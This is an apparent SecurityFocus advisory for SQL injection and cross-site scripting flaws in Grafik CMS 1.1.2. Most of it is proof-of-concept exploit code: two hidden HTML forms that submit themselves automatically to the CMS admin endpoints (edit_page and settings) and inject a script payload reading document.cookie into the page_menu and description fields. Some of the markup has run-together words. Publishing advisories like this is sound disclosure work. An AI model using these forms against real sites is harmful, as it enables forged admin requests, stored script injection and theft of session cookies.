source: https://www.securityfocus.com/bid/41227/info
Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data,or exploit latent vulnerabilities in the underlying database.
Grafik CMS 1.1.2is vulnerable; other versions may be affected.<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main"><inputtype="hidden" name="page_title" value="page title"/><inputtype="hidden" name="page_menu" value='descr"><script>alert(document.cookie)</script>' /><inputtype="hidden" name="id" value="1"/><inputtype="hidden" name="page_content" value="some page content"/><inputid="sbmt"type="submit" name="submit" value="Modifier"/></form><script>
document.getElementById('sbmt').click();</script><form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main"><inputtype="hidden" name="name" value="site title"/><inputtype="hidden" name="admin_mail" value="example@example.com"/><inputtype="hidden" name="keywords" value=""/><inputtype="hidden" name="description" value='descr"><script>alert(document.cookie)</script>' /><inputtype="hidden" name="site_url" value="http://www.example.com/"/><inputtype="hidden" name="seo_url" value="0"/><inputtype="hidden" name="mailing" value="1"/><inputtype="hidden" name="template" value="templates/default"/><inputid="sbmt"type="submit" name="submit" value="Valider"/></form><script>
document.getElementById('sbmt').click();</script>
